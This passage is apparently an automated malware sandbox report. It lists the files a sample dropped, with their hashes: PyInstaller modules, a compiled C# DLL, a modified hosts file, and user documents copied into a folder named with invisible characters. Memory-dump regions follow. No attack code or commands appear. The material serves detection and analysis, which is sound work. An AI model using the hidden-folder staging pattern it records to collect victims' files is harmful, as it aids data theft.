00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31322\select.pyd

Filesize
25KB

MD5
45d5a749e3cd3c2de26a855b582373f6

SHA1
90bb8ac4495f239c07ec2090b935628a320b31fc

SHA256
2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876

SHA512
c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31322\sqlite3.dll

Filesize
622KB

MD5
dbc64142944210671cca9d449dab62e6

SHA1
a2a2098b04b1205ba221244be43b88d90688334c

SHA256
6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c

SHA512
3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31322\unicodedata.pyd

Filesize
295KB

MD5
8c42fcc013a1820f82667188e77be22d

SHA1
fba7e4e0f86619aaf2868cedd72149e56a5a87d4

SHA256
0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2

SHA512
3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dpxdw1xq.zaa.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\een4urfw\een4urfw.dll

Filesize
4KB

MD5
bdc0d7f062e776c17802ac34cc2e471c

SHA1
29cc0a42003ca9b8d6622f0cf9e6d801aafc77dd

SHA256
1b0af3318a40fd4954752cbfe1702c96c59713b338689641dc94de5aa02f6668

SHA512
225bb0285e3c58906f20eb3f012e58d4095685507ec033a08f7cd934ae2f60b267bc3bd40f2be3e9b2f6af36de45d6d0fb156b207152cce3b2e6b733870aa1ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Desktop\BlockOut.xlsx

Filesize
13KB

MD5
8da096cc8b05fbfa4fb2a9316baac19a

SHA1
6e43982580a9d653e4cf897de0c0743ea7ca827e

SHA256
de8b4ddfa10d975e0e4ed4286e298308e44de5ea585926cf60d7afa97121dce7

SHA512
1f71ce44114a1cbccc3fa9bf8b1227991f83b7c6bba5173a1a7d8acf8fca27d6b90f5160476d941a5f8c3f34249e56198ad73d524094e09ef7cc4a8f1a89c486

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Desktop\MergeRegister.jpg

Filesize
172KB

MD5
2858f1d889f5d7bab15eb65a74bd87f4

SHA1
32206d3a4b90a3667b6ab840d3955dec51dfdf64

SHA256
ebea3d978be73631f72f6c6a99078e71ed95761e916273baf1d4a21a748e9dda

SHA512
5b39f0322dda347c01e215ece8c1b377d2168a0acaf7ec18ac2f217dcf68f774df84447b5e1670f3faec7d3a51a00f0a98370a723da3728d77d2435ff0a68345

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Desktop\RestartConnect.xlsx

Filesize
10KB

MD5
9e051f83a0c219e7441dc35bc1f25fe0

SHA1
bea9da869add97e8b2b6dbf9bf0da65935b40593

SHA256
277b710838677fc2542c97cb0bda5f9838232a96b898dc5b5c6627054058b988

SHA512
4643d09ffc63636343158202636a39dd5669e2f343b5057bc2d394fb44bda0da86770b25c627222ba18dfce6fc505d6c975aae2e1d0ee0c0d6d2d4dbfe47b882

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Desktop\UnprotectResize.xlsx

Filesize
12KB

MD5
e60b1a8c899f18ee1371fb24b54908df

SHA1
ec410668c2747b436a1ff72696eb34b7672c3b57

SHA256
1a9a4dc45d66b784b4d616f10bc11a08e784c8c55266b045c3f76c8fc7a2892d

SHA512
bb9d76b151a4cbb93577b6515aa73abe1889cb34585e1bb2ffcd63a7511a90c668d56a1251654a4bcb06447d3712505ccf1e207cd16eedd01a8ba399b5d34a17

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Desktop\WatchInvoke.docx

Filesize
16KB

MD5
e1240af7765b644b2075344c7120a085

SHA1
dfd9c72911d4be1906ea723f6cbdf77ebfe74f3d

SHA256
73facd63ebfc1175be9e2b6312a0bc749db28e27915cb584ca0f6e508e68426f

SHA512
4875fe2a987e829f85d5559c68213d3ce5bf29faa9af36b2b9185ec7eab7b478362f63553bd30c105474615ffc8c776dae4a5f24ab739f787eae9cd15a57b501

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Documents\BackupReset.htm

Filesize
1.3MB

MD5
de85202abc00e0a43d7bd4e837205cbf

SHA1
6af8be13d51f812940fac86bf39a4c3d54086513

SHA256
7318230b6a2fcf2fad8b6534eca6af0c5e207728772973c9f8bd4186fbceff3d

SHA512
777174339676b9f4627316bd153224142b67128fccf14432b7ff940d482b4463c902531b2588a1dadaa174af71750b28ddc97aaa986cbb9cbcb9fe4608d07e01

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Documents\BlockEdit.doc

Filesize
1.9MB

MD5
fed4a726c0d40981f2b9313816c8443b

SHA1
45ce2cd57a9d148c11acd6b2446dceb18e5bf87f

SHA256
40748b4b0a293762f8bf8d37cdad81088a7e2158b3fc6c6dfe3cf637e3e30317

SHA512
9f1acdbac93a752da551cd64827f31afa86a19e53de28892dc538c9c4e489c0b5723802056804473129a7966b915ece5cc7270445f2bf3b420e5ffa104a1eba0

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Documents\CloseBackup.pptm

Filesize
1.1MB

MD5
65db86e964314f5edcc569f71c0e6b08

SHA1
54f9253dd6a83d1d0d3f2f99dc258abd25f7a544

SHA256
2c07ca4880bad0e6f5b2b1ad3b89d55e259cccbe5f4153968443b5bf29c4f06a

SHA512
8ed02fd8e0658460e31fcff511e6c1902c744fd3be675fec630512606f16128fd7007b72c779ef7b88915f6dc0b650f70967d1dae0025a062afa9a7e3fdfdb33

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Documents\GetBackup.docx

Filesize
13KB

MD5
f3796dec30df358f4bedf32d010ea29a

SHA1
8307f4126ca0d2cf50f2ab7d518e8fdd09e93829

SHA256
24e9bfffd7aa48250a23c4cb3742fb6f446d70ba1adb6896db65080790055e74

SHA512
f3dcae6e04537d29b61083d18d51577a1cfe417e9accf3d2825e904454db9ec7d93867ee840bd8a151aa6b24b6868addf3f0ead391bdd733a2ac2155fd2d880f

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Documents\SetConvertTo.xlsx

Filesize
10KB

MD5
79887456b19591a8a38b568f797259e0

SHA1
ac9bfdb503d1561669847582527f3f0b023960dd

SHA256
1db97cd5b4cf5059fb04d7ac0c83d49979e6c42f4ee1ba337ea3b764df853f32

SHA512
3effe53774278a2e9ddfc34dc5c26b1322c4f41aefbe154daa42132848c4e846e58c893a4ac72da6ead824d6f2b4a0432e42a32b9b71513064193ce831573e44

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Documents\StepUnregister.docx

Filesize
13KB

MD5
c3f699644377ad26164de99cc019c1fa

SHA1
9c85e0e733c3ce72beba8ebbae4be8ea2b421e47

SHA256
90781270ae30fca1a6ffcd3015bfb4954fdd98ce0b9fce0fdc31bbe93b8e6100

SHA512
5f629abc0a4f32cdfd2ba76aff698a154ac802b86563e62f3066e350ce239a46280995fe32f120af429c9e062cb33642e4b00c90370663419876f79a0aeada67

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Documents\SwitchSelect.xlsx

Filesize
10KB

MD5
51bfb819109e7f5eb956019c11ab0d09

SHA1
de14c5212c749649903188d383e652e98486d381

SHA256
66c4d844ce4ad36c7359415c8705c2cf9eeb75a64c1fee485de0e3fafdcb75cd

SHA512
f6158370a480a39e459ac2c08d5aed5c929b3fe6acf80f4269d92b8c82673091f55d52289f654d2b565bc207e8a7abd755a87b797089a1abfacdb439fa143798

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Documents\UnblockSelect.docx

Filesize
17KB

MD5
89b3b544e3f7f65ad8d299b7e6f10f81

SHA1
cacac8816868c6c7a592635e5154b9fd78983810

SHA256
c84a2026b5eae0cf0da2e79d0c3eb6cef14a61d4d3bad4ad7b16efb55ae2ece1

SHA512
b89fbedf18affd26cf75692cab111f96eb2bc12db1cc5324342993c8cbbacf74448746dcb782a4e6ac8fa16b9919ad4e568b65a26adc79e47815afa1f94f9d29

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ ‏‏ \Common Files\Documents\UseFind.csv

Filesize
1.0MB

MD5
c95c72234c5b3552e55a74512104689b

SHA1
46a1ba7d714c8f6dcbf9aa5093065e1efe9f7f67

SHA256
5d0bb040ff87aa1b3cd68506a99320a17fa09e406b474e04b045dc8b062b1c68

SHA512
28365acb1d7880f28a90fcf26fac11f6079101a86348681da0e547f782b881f059dfb32ccbf1a7d726bec673c0b20d60f83e80e1f8e87db9a94789c3f91f6b52

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\een4urfw\CSCF641F1BC74AE4969ADEA82F4BA620C6.TMP

Filesize
652B

MD5
0c4991928e7ce1ef03f93c26ba68d376

SHA1
817c737dbf251e9fc31f3fa169c38665e7df7c36

SHA256
b32ba86dc5f29eac60a45595afb58c609ff2ac2b3a1d054fa1d82c2fac3a5c6a

SHA512
3d41646d6ddacc47d6827ed9a13e66990c959876918cc760fbb970f91a59701ce312b59773d323fb04f1a33a5d3561f631b26a60e010c98995bb77ae0609f395

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\een4urfw\een4urfw.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\een4urfw\een4urfw.cmdline

Filesize
607B

MD5
c068c9a33f27b0c0e53cf8aa11b8ec60

SHA1
964c5e107d47418a20213707d77b48407e8020e3

SHA256
547794e313167a3797f63f808250b3abc2fceff3ae36246f9775c33be6b3e776

SHA512
e6b9401b4f0eca32326287c3f24a9060710673b0115a61bbd89ad2407afceb7b60cd9d600509ef3f3fe16fb21c0aac423f9a42152398196eae964a72e2078489

Download Submit
memory/2772-179-0x0000019B41920000-0x0000019B41B3D000-memory.dmp

Filesize
2.1MB

Download
memory/3628-205-0x000001DA99E40000-0x000001DA9A05D000-memory.dmp

Filesize
2.1MB

Download
memory/3628-194-0x000001DA99E10000-0x000001DA99E18000-memory.dmp

Filesize
32KB

Download
memory/4160-54-0x00007FF96D350000-0x00007FF96D37D000-memory.dmp

Filesize
180KB

Download
memory/4160-76-0x00007FF970610000-0x00007FF97061D000-memory.dmp

Filesize
52KB

Download
memory/4160-70-0x00007FF95BBE0000-0x00007FF95C100000-memory.dmp

Filesize
5.1MB

Download
memory/4160-71-0x00007FF95BB10000-0x00007FF95BBDD000-memory.dmp

Filesize
820KB

Download
memory/4160-107-0x00007FF95C100000-0x00007FF95C277000-memory.dmp

Filesize
1.5MB

Download
memory/4160-72-0x00007FF970640000-0x00007FF970663000-memory.dmp

Filesize
140KB

Download
memory/4160-74-0x00007FF96AEB0000-0x00007FF96AEC4000-memory.dmp

Filesize
80KB

Download
memory/4160-69-0x00007FF95C280000-0x00007FF95C869000-memory.dmp

Filesize
5.9MB

Download
memory/4160-261-0x00007FF96A9C0000-0x00007FF96A9F3000-memory.dmp

Filesize
204KB

Download
memory/4160-66-0x00007FF96A9C0000-0x00007FF96A9F3000-memory.dmp

Filesize
204KB

Download
memory/4160-64-0x00007FF972A50000-0x00007FF972A5D000-memory.dmp

Filesize
52KB

Download
memory/4160-62-0x00007FF96C5B0000-0x00007FF96C5C9000-memory.dmp

Filesize
100KB

Download
memory/4160-60-0x00007FF95C100000-0x00007FF95C277000-memory.dmp

Filesize
1.5MB

Download
memory/4160-58-0x00007FF96AC00000-0x00007FF96AC23000-memory.dmp

Filesize
140KB

Download
memory/4160-56-0x00007FF96D760000-0x00007FF96D779000-memory.dmp

Filesize
100KB

Download
memory/4160-79-0x00007FF95B7D0000-0x00007FF95B8EC000-memory.dmp

Filesize
1.1MB

Download
memory/4160-272-0x00007FF95BBE0000-0x00007FF95C100000-memory.dmp

Filesize
5.1MB

Download
memory/4160-273-0x00007FF95BB10000-0x00007FF95BBDD000-memory.dmp

Filesize
820KB

Download
memory/4160-48-0x00007FF972A60000-0x00007FF972A6F000-memory.dmp

Filesize
60KB

Download
memory/4160-30-0x00007FF970640000-0x00007FF970663000-memory.dmp

Filesize
140KB

Download
memory/4160-25-0x00007FF95C280000-0x00007FF95C869000-memory.dmp

Filesize
5.9MB

Download
memory/4160-184-0x00007FF96C5B0000-0x00007FF96C5C9000-memory.dmp

Filesize
100KB

Download
memory/4160-100-0x00007FF96AC00000-0x00007FF96AC23000-memory.dmp

Filesize
140KB

Download
memory/4160-78-0x00007FF96D760000-0x00007FF96D779000-memory.dmp

Filesize
100KB

Download
memory/4160-328-0x00007FF95BB10000-0x00007FF95BBDD000-memory.dmp

Filesize
820KB

Download
memory/4160-282-0x00007FF95C280000-0x00007FF95C869000-memory.dmp

Filesize
5.9MB

Download
memory/4160-288-0x00007FF95C100000-0x00007FF95C277000-memory.dmp

Filesize
1.5MB

Download
memory/4160-283-0x00007FF970640000-0x00007FF970663000-memory.dmp

Filesize
140KB

Download
memory/4160-318-0x00007FF970640000-0x00007FF970663000-memory.dmp

Filesize
140KB

Download
memory/4160-331-0x00007FF95B7D0000-0x00007FF95B8EC000-memory.dmp

Filesize
1.1MB

Download
memory/4160-330-0x00007FF970610000-0x00007FF97061D000-memory.dmp

Filesize
52KB

Download
memory/4160-329-0x00007FF96AEB0000-0x00007FF96AEC4000-memory.dmp

Filesize
80KB

Download
memory/4160-327-0x00007FF95BBE0000-0x00007FF95C100000-memory.dmp

Filesize
5.1MB

Download
memory/4160-326-0x00007FF96A9C0000-0x00007FF96A9F3000-memory.dmp

Filesize
204KB

Download
memory/4160-325-0x00007FF972A50000-0x00007FF972A5D000-memory.dmp

Filesize
52KB

Download
memory/4160-324-0x00007FF96C5B0000-0x00007FF96C5C9000-memory.dmp

Filesize
100KB

Download
memory/4160-323-0x00007FF95C100000-0x00007FF95C277000-memory.dmp

Filesize
1.5MB

Download
memory/4160-322-0x00007FF96AC00000-0x00007FF96AC23000-memory.dmp

Filesize
140KB

Download
memory/4160-321-0x00007FF96D760000-0x00007FF96D779000-memory.dmp

Filesize
100KB

Download
memory/4160-320-0x00007FF96D350000-0x00007FF96D37D000-memory.dmp

Filesize
180KB

Download
memory/4160-319-0x00007FF972A60000-0x00007FF972A6F000-memory.dmp

Filesize
60KB

Download
memory/4160-317-0x00007FF95C280000-0x00007FF95C869000-memory.dmp

Filesize
5.9MB

Download
memory/5028-81-0x0000020141FD0000-0x0000020141FF2000-memory.dmp

Filesize
136KB

Download